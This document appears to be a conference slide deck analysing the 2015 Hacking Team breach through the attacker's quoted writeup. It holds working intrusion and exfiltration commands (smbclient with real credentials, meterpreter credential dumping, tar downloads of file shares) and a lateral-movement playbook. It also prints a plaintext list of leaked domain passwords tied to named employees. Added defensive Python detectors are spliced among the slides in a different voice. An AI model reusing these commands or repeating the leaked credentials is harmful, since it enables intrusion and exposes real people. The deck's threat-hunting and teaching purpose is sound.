Date posted: 09-Apr-2017 | Category: Technology | Uploaded by: north-texas-chapter-of-the-issa
© 2016 Cybereason Inc. All rights reserved.
The “Hack Back”: How Hacking Team became “Hacked Team”
Brad Green, Sr. Sales Engineer
The Hackers are Hacked
Hacking Team data exfiltration early July 2015
Hacking Team’s twitter account (@hackingteam) is hijacked and posts links to 400+ GB torrent file on July 5, 2015
Website defaced to read “Hacked Team”
Inside the Torrent File
All of the exchange server data
All of the RCS installers + manuals + source code
Important and private documents
Screenshots from employees’ machines
Entire GIT repository
Pirated software and pirated versions of Operating systems
3 full server images (Windows Attack server, Android attack server and the helpdesk support server)
TTP’s: A Refresher
Tactics: The art or skills employed as means to accomplish an end
Techniques: Unique ways or methods performed to accomplish a goal
Procedures: Standardized, detailed steps that prescribe how to perform specific tasks
Tactics
Sole reliance on 0-day exploits
100% endpoint Privilege escalation
Operations mirroring Flame Capabilities
Use of news and adword services “ad hosting” – C&C use news-related jargon
Single-shot campaigns tied to ultra specific targets
Algorithmic assessment of target OS and browser
Switch exploits in real-time based on endpoint assessment
Ability to exploit any Windows OS XP and Above
Ability to exploit ANY Mobile Operating System including Symbian
Techniques
Gain NT AUTHORITY\SYSTEM privileges in the SYSTEM shell, then execute the agent.exe for the RCS client
Spear-phishing and waterhole delivery mechanisms
Network Injector and Binary Melter
Lazy looking 404 error pages used for non-intended targets
Use of 0-day exploits for Flash and Java (and Silverlight?)
Use of the Windows kernel vulnerability (CVE-2015-2387) in the open type font manager module (ATMFD.dll) — can bypass sandbox mitigation mechanism
Use of UEFI BIOS Rootkit to keep Remote Control System agent persistent
Network Injector
“. . .a particularly nasty tool that would be plugged into an upstream or ISP backbone. Once active, the network injector would be able to identify the target(s) based on a customer defined rule set and wait for the victim to visit a specific URL, such as YouTube.com. Then, it would automatically redirect the victim to the team’s infection server instead.”
Melter could be used in conjunction with Network injector to “melt” the RCS binary into benign software during download
Procedures
Registered domains in Tel Aviv under the name David Cohen (the Israeli equivalent of “John Smith”)
Follow infection server process below for exact target exploitation
Request cloud based anonymizing service prior to exploitation and delivery to evade attribution using Virtual Private Server
Who did it?
Single actor takes credit
http://pastebin.com/raw/GPSHF04A (Spanish)
http://pastebin.com/raw/0SNSvyjJ (English)
Pastebin post on April 15th, 2016 in Spanish (followed by English translation)
Part Manifesto
Part DIY Guide
Part Play-by-Play
Completely Fascinating
His thought process
“In the news we often see attacks traced back to government-backed hacking groups ("APTs"), because they repeatedly use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc). They're negligent because they can hack without legal consequences.”
“I didn't want to make the police's work any easier by relating my hack of Hacking Team with other hacks I've done or with names I use in my day-to-day work as a blackhat hacker. So, I used new servers and domain names, registered with new emails, and paid for with new bitcoin addresses. Also, I only used tools that are publicly available, or things that I wrote specifically for this attack, and I changed my way of doing some things to not leave my usual forensic footprint.”
Recon - TTPs
“Although it can be tedious, this stage is very important, since the larger the attack surface, the easier it is to find a hole somewhere in it.”
Domain and Subdomain Enumeration
WHOIS and Reverse Lookups
Scanning
“The company's IDS might generate an alert, but you don't have to worry since the whole internet is being scanned constantly.”
Social Info
LinkedIn, data.com, Metadata from published data files
Infiltration
Phishing?
“I didn't want to try to spearphish Hacking Team, as their whole business is helping governments spearphish their opponents, so they'd be much more likely to recognize and investigate a spearphishing attempt.”
Buy Access?
“Thanks to hardworking Russians and their exploit kits, traffic sellers, and bot herders, many companies already have compromised computers in their networks. Almost all of the Fortune 500, with their huge networks, have some bots already inside. However, Hacking Team is a very small company, and most of its employees are infosec experts, so there was a low chance that they'd already been compromised.”
Exploitation
Hacking Team has a range of public IP:
inetnum: 93.62.139.32 - 93.62.139.47
descr: HT public subnet
“What they had was their main website (a Joomla blog in which Joomscan [2] didn't find anything serious), a mail server, a couple routers, two VPN appliances, and a spam filtering appliance.”
“So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices.”
“A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit. Since the vulnerabilities still haven't been patched, I won't give more details...”
“The worst thing that could happen would be for my backdoor or post-exploitation tools to make the system unstable and cause an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network.”
Post-Exploitation / C2 / Persistence
“I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device. The backdoor serves to protect the exploit. Using the exploit just once and then returning through the backdoor makes it harder to identify and patch the vulnerabilities.”
1) busybox
2) nmap
3) Responder.py: The most useful tool to attack Windows networks when you have access to the internal network but do not have a domain user.
4) Python
5) tcpdump
6) Dsniff: I wanted to use ettercap, written by Hacking Team's own ALoR and NaGA, but it was hard to compile it for the system.
7) socat
8) screen: Like the shell with pty, it wasn't really necessary, but I wanted to feel at home in Hacking Team's network.
9) a SOCKS proxy server: To use with proxychains to access the internal network with any other program.
Exploitation Successful
“Now inside their internal network, I wanted to take a look around and think about my next step. I started Responder.py in analysis mode (-A to listen without sending poisoned responses), and did a slow scan with nmap.”
“Just when I was worried that they'd finally patched all of the authentication bypass bugs in MySQL [2][3][4][5], new databases came into style that lack authentication by design. Nmap found a few in Hacking Team's internal network:”
“They were the databases for test instances of RCS. The audio that RCS records is stored in MongoDB with GridFS. The audio folder in the torrent [6] came from this. They were spying on themselves without meaning to.”
27017/tcp open MongoDB MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_  Version = 2.6.5
27017/tcp open MongoDB MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   DATABASES
...
|_  Version = 2.6.5
Internal Recon Finds Fruit
“Their insecure backups were the vulnerability that opened their doors. According to their documentation [1], their iSCSI devices were supposed to be on a separate network, but nmap found a few in their subnetwork”
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required
Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required
“iSCSI needs a kernel module, and it would've been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:”
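The nmap reports above, and the MongoDB ones on the previous slide, are exactly the findings a defender wants out of an internal scan before an intruder produces them. The following is an added example, not code from this talk or from the writeup it quotes: a small Python parser over nmap's normal output that flags iSCSI targets whose iscsi-info script reports no authentication, and MongoDB instances whose database list nmap's mongodb-databases script could read without credentials. The input is a constructed excerpt in the shape of that output; the first two hosts mirror the slide, while the hosts rcs-test.hackingteam.local and nas-locked.example.local and the "Authentication: Required" line are assumed.

```python
"""Flag network services that nmap's NSE scripts show as reachable without
credentials: iSCSI targets (iscsi-info) and MongoDB instances whose database
list could be read (mongodb-databases).  Added example; the sample below is a
constructed excerpt shaped like `nmap -sV --script iscsi-info,mongodb-databases`
normal output (the first two hosts mirror the slide, the last two are assumed)."""
import re

SAMPLE_NMAP = """\
Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

Nmap scan report for rcs-test.hackingteam.local (192.168.200.90)
27017/tcp open  mongodb  MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|_  version = 2.6.5

Nmap scan report for nas-locked.example.local (192.168.200.99)
3260/tcp  open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:nas-locked.name
|     Address: 192.168.200.99:3260,0
|_    Authentication: Required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?$")


def parse_reports(text):
    """Split nmap normal output into {host: [lines]} keyed by the scanned name."""
    reports, current = {}, None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            reports[current] = []
        elif current is not None:
            reports[current].append(line)
    return reports


def find_unauthenticated(text):
    """Return (host, service, detail) for every finding, in scan order."""
    findings = []
    for host, lines in parse_reports(text).items():
        script, target = None, None
        for line in lines:
            if not line.startswith("|"):
                script = None  # left the NSE script-output block
                continue
            body = line.lstrip("|_ ")  # strip nmap's script-output gutter
            if body.endswith(":") and " " not in body:  # e.g. "iscsi-info:" header
                script, target = body[:-1], None
            elif script == "iscsi-info" and body.startswith("Target:"):
                target = body.split(":", 1)[1].strip()
            elif script == "iscsi-info" and body.startswith("Authentication:"):
                if "no authentication" in body.lower():
                    findings.append((host, "iscsi", target))
            elif script == "mongodb-databases" and body == "ok = 1":
                # ok = 1 means listDatabases succeeded for nmap's unauthenticated request
                findings.append((host, "mongodb", "database list readable without credentials"))
    return findings


if __name__ == "__main__":
    for host, service, detail in find_unauthenticated(SAMPLE_NMAP):
        print(f"{host}: {service} reachable without authentication ({detail})")
```

Run it over saved `-oN` output from a scheduled internal scan; any iSCSI target that answers without CHAP, or any MongoDB that lists its databases to an anonymous client, should be treated as an exposed backup or data store regardless of which VLAN the documentation says it lives on.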
Mount the NAS
[A lot of complicated work with traffic forwarding and VPS]
“...the device file appears! We mount it... and find backups of various virtual machines. The Exchange server seemed like the most interesting. It was too big to download, but it was possible to mount it remotely to look for interesting files:”
$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT
“What interested me most in the backup was seeing if it had a password or hash that could be used to access the live server. I used pwdump, cachedump, and lsadump [1] on the registry hives. lsadump found the password to the besadmin service account:”
_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
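The dump above is the decrypted secret exactly as lsadump prints it: in this dump the first four bytes are a little-endian byte length (0x16 = 22), the value begins at offset 0x10, and it is stored as UTF-16LE. That is the whole lesson of the slide for a defender: an offline copy of the registry hives in a backup hands over service-account credentials in the clear, so backups of domain-joined servers need the same access controls as the servers themselves. The following added example (not from the talk or the writeup; the function names are mine) parses that hex-dump layout and decodes the value.

```python
"""Decode the lsadump-style hex dump quoted on the slide: rows of an offset,
16 hex bytes and an ASCII gutter.  In this dump the first four bytes are a
little-endian byte length and the value starts at offset 0x10 as UTF-16LE.
Added example; the dump text is the one shown on the slide."""
import struct

LSADUMP_TEXT = """\
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
"""

HEADER_LEN = 0x10  # value bytes begin at offset 0x10 in this dump


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from an offset/hex/ASCII dump with full 16-byte rows,
    ignoring the ASCII gutter and checking that offsets are contiguous."""
    raw = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        offset = int(tokens[0], 16)
        if offset != len(raw):
            raise ValueError(f"non-contiguous dump at offset {offset:#06x}")
        raw.extend(int(t, 16) for t in tokens[1:17])  # the 16 hex byte columns
    return bytes(raw)


def decode_secret(dump):
    """Return (declared_length, decoded_value) for the dumped secret blob."""
    raw = hexdump_to_bytes(dump)
    (length,) = struct.unpack_from("<I", raw, 0)
    if HEADER_LEN + length > len(raw):
        raise ValueError("declared length exceeds the dumped bytes")
    value = raw[HEADER_LEN:HEADER_LEN + length].decode("utf-16-le")
    return length, value


if __name__ == "__main__":
    length, value = decode_secret(LSADUMP_TEXT)
    print(f"{length} bytes of UTF-16LE -> {value!r}")
```

The declared length (22 bytes, eleven UTF-16 code units) matches the slide's `b.e.s.3.2.6.7.8.` and `!.!.!` gutter text, which is why a backup of the hives was as good as a logon to the live Exchange server.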
Explore the Backups
“I used proxychains [2] with the socks server on the embedded device and smbclient [3] to check the password:”
proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'
“It worked! The password for besadmin was still valid, and a local admin. I used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and got a bunch of passwords, including the Domain Admin:”
The Passwords
HACKINGTEAM BESAdmin bes32678!!!
HACKINGTEAM Administrator uu8dd8ndd12!
HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
HACKINGTEAM m.romeo ioLK/(90
HACKINGTEAM l.guerra 4luc@=.=
HACKINGTEAM d.martinez W4tudul3sp
HACKINGTEAM g.russo GCBr0s0705!
HACKINGTEAM a.scarafile Cd4432996111
HACKINGTEAM r.viscardi Ht2015!
HACKINGTEAM a.mino A!e$$andra
HACKINGTEAM m.bettini Ettore&Bella0314
HACKINGTEAM m.luppi Blackou7
HACKINGTEAM s.gallucci 1S9i8m4o!
HACKINGTEAM d.milan set!dob66
HACKINGTEAM w.furlan Blu3.B3rry!
HACKINGTEAM d.romualdi Rd13136f@#
HACKINGTEAM l.invernizzi L0r3nz0123!
HACKINGTEAM e.ciceri 2O2571&2E
HACKINGTEAM e.rabe erab@4HT!
“Many have made fun of Christian Pozzi's weak passwords...”
“...The reality is that mimikatz and keyloggers view all passwords equally.”
A word on Lateral Movement
Remote Movement:
1) psexec: The tried and true method for lateral movement on windows.
2) WMI: The most stealthy method. The WMI service is enabled on all windows computers, but except for servers, the firewall blocks it by default
3) PSRemoting [10]: It's disabled by default, and I don't recommend enabling new protocols. But, if the sysadmin has already enabled it, it's very convenient, especially if you use powershell for everything (and you should use powershell for almost everything, it will change [11] with powershell 5 and windows 10, but for now powershell makes it easy to do everything in RAM, avoid AV, and leave a small footprint)
4) Scheduled Tasks: You can execute remote programs with at and schtasks [5]. It works in the same situations where you could use psexec, and it also leaves a well known footprint [12].
5) GPO: If all those protocols are disabled or blocked by the firewall, once you're Domain Admin, you can use GPO to give users a login script, install an msi, execute a scheduled task [13], or, like we'll see with the computer of Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and open the firewall.
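Each of the five remote-movement methods above leaves a distinct trace in host logs, which is the defender's side of the same list. The following is an added example, not code from this talk or from the writeup it quotes: Python rules over constructed Windows event records (dict keys follow the Security and System log field names; the hosts, users, task name and GPO DN are hypothetical) that flag a PsExec-style service install (System event 7045 with PsExec's default PSEXESVC service name), processes created under WMI's provider host or the PowerShell remoting host (Security event 4688, whose creator process name field exists on Windows 10 / Server 2016 and later), scheduled task creation (4698), and modification of a Group Policy object (5136 on a groupPolicyContainer object). The 4688 rules require process-creation auditing and the 5136 rule requires directory-service object auditing on the domain controller.

```python
"""Host-log detections for the five remote-movement methods listed above.
Added example, not from the talk; events are constructed dicts whose keys
follow the Windows Security/System log field names (hosts/users hypothetical)."""

SAMPLE_EVENTS = [
    # 1) psexec: Sysinternals PsExec installs its service (PSEXESVC by default) on the target
    {"event_id": 7045, "host": "ws01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "LocalSystem"},
    # 2) WMI: Win32_Process.Create launches the child under the WMI provider host
    {"event_id": 4688, "host": "ws02", "SubjectUserName": "alice",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"},
    # 3) PSRemoting: commands of a remote session run under wsmprovhost.exe
    {"event_id": 4688, "host": "ws03", "SubjectUserName": "svc-build",
     "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wsmprovhost.exe"},
    # 4) at / schtasks: task registration is audited as Security 4698
    {"event_id": 4698, "host": "srv01", "SubjectUserName": "svc-backup",
     "TaskName": "\\Microsoft\\Windows\\Updater"},
    # 5) GPO: editing a policy modifies its groupPolicyContainer object in AD (hypothetical DN)
    {"event_id": 5136, "host": "dc01", "SubjectUserName": "administrator",
     "ObjectClass": "groupPolicyContainer",
     "ObjectDN": "CN={PLACEHOLDER-GPO-GUID},CN=Policies,CN=System,DC=example,DC=local",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames"},
    # benign: the shell of an interactive logon, must not fire
    {"event_id": 4688, "host": "ws04", "SubjectUserName": "bob",
     "NewProcessName": "C:\\Windows\\explorer.exe",
     "ParentProcessName": "C:\\Windows\\System32\\userinit.exe"},
]


def _parent_is(event, exe_name):
    """True when a 4688 record's creator process is the named executable."""
    parent = event.get("ParentProcessName", "")
    return event["event_id"] == 4688 and parent.lower().endswith("\\" + exe_name)


def rule_psexec(event):
    if event["event_id"] != 7045:
        return None
    names = (event.get("ServiceName", "") + event.get("ImagePath", "")).upper()
    return "psexec: service installed with PsExec's default name" if "PSEXESVC" in names else None


def rule_wmi(event):
    return "wmi: process spawned by WmiPrvSE.exe" if _parent_is(event, "wmiprvse.exe") else None


def rule_psremoting(event):
    return "psremoting: process spawned by wsmprovhost.exe" if _parent_is(event, "wsmprovhost.exe") else None


def rule_schtask(event):
    if event["event_id"] == 4698:
        return "scheduled task created: " + event.get("TaskName", "?")
    return None


def rule_gpo(event):
    if event["event_id"] == 5136 and event.get("ObjectClass") == "groupPolicyContainer":
        return "gpo: group policy object modified (" + event.get("AttributeLDAPDisplayName", "?") + ")"
    return None


RULES = (rule_psexec, rule_wmi, rule_psremoting, rule_schtask, rule_gpo)


def detect(events):
    """Return (host, event_id, verdict) for every rule hit, in event order."""
    hits = []
    for event in events:
        for rule in RULES:
            verdict = rule(event)
            if verdict:
                hits.append((event["host"], event["event_id"], verdict))
    return hits


if __name__ == "__main__":
    for host, event_id, verdict in detect(SAMPLE_EVENTS):
        print(f"{host} [{event_id}] {verdict}")
```

The PsExec rule keys on the default service name, so a renamed service or a different implementation would need the broader signal of any 7045 service install following a network logon; the parent-process rules are the more durable ones, because the WMI and WinRM hosts are what actually spawn the remote command whatever tool requested it.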
A word on “In-Place” Movement (Changing context)
1) Token Stealing: Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain. Two tools for doing this are incognito [1] and the mimikatz token::* commands [2].
2) MS14-068: You can take advantage of a validation bug in Kerberos to generate Domain Admin tickets [3][4][5].
3) Pass the Hash: If you have a user's hash, but they're not logged in, you can use sekurlsa::pth [2] to get a ticket for the user.
4) Process Injection: Any RAT can inject itself into other processes. For example, the migrate command in meterpreter and pupy [6], or the psinject [7] command in powershell empire. You can inject into the process that has the token you want.
5) runas: This is sometimes very useful since it doesn't require admin privileges. The command is part of windows, but if you don't have a GUI you can use powershell [8].
“One of my favorite hobbies is hunting sysadmins”
“Reading their documentation about their infrastructure [1], I saw that I was still missing access to something important - the "Rete Sviluppo", an isolated network with the source code for RCS. The sysadmins of a company always have access to everything, so I searched the computers of Mauro Romeo and Christian Pozzi to see how they administer the Sviluppo network, and to see if there were any other interesting systems I should investigate. It was simple to access their computers, since they were part of the windows domain where I'd already gotten admin access. Mauro Romeo's computer didn't have any ports open, so I opened the port for WMI [2] and executed meterpreter [3]. In addition to keylogging and screen scraping with Get-Keystrokes and Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 [4], and searched for interesting files [5]. Upon seeing that Pozzi had a Truecrypt volume, I waited until he'd mounted it and then copied off the files.”
The Bridge
“Within Christian Pozzi's Truecrypt volume, there was a text file with many passwords [1]. One of those was for a Fully Automated Nagios server, which had access to the Sviluppo network in order to monitor it. I'd found the bridge I needed. The text file just had the password to the web interface, but there was a public code execution exploit [2] (it's an unauthenticated exploit, but it requires that at least one user has a session initiated, for which I used the password from the text file).”
Data Exfiltration
“With the Domain Admin password, I have access to the email, the heart of the company. Curiously, I found a bug with Powershell's date handling. After downloading the emails, it took me another couple weeks to get access to the source code and everything else, so I returned every now and then to download the new emails. The server was Italian, with dates in the format day/month/year. I used:”
-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
“Now that I'd gotten Domain Admin, I started to download file shares using my proxy and the -Tc option of smbclient, for example:”
proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
“I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in the torrent like that.”
What it Means – TTP’s Reign Supreme
• Recompile: Hash Values
• Obfuscator: Signatures
• Stolen Credit Card: Domain names
• Botnet, Hacked Server, Hosting: IP Addresses
• Custom development: Tools
• Years of innovation: TTPs
What it Means – MITRE ATT&CK Model: Adversarial Tactics, Techniques, & Common Knowledge
What it Means – Hunt!
[Figure: damage versus time (seconds, minutes, hours, days, weeks, months), marking Penetration, Recon, Spread, C&C, Damage, Breach detected and the span of the hacking operation]
Increase focus on actively hunting your adversary at the endpoint
Static IOC’s important but not enough – detect attackers by their behavior
Interesting Things
Silverlight Exploit: CVE-2016-0034 (January MS16-006):
• Purchased from Vitaliy Toropov for $45k in 2013
• Toropov claims it was written 2.5 years prior
• Kaspersky researchers write YARA rule based on POC code from email
• First YARA hit November 25, 2015 (compiled July 21, 2015)
Interesting Things
At the time of the breach:
tmp_privesc has a 0/55 on VT
Mynewsfeeds.info is pretty clean, too
Following the breach, dozens of hashes started showing up on VT – likely due to numerous groups downloading and compiling the code
Interesting Things
Internal post speculating on the number of zero-days in play.
- Assumes a zero-day persists for an average of 312 days before detection
- References Stefan Frei (NSS Labs in Austin)
“Frei said that in light of the present zero-day reality, he has three pieces of advice for C-Level executives:
- Assume you are compromised, and that you will get compromised again.
- Prevention is limited; invest in breach detection so that you can quickly find and act on any compromises.
- Make sure you have a process for properly responding to compromises when they do happen.”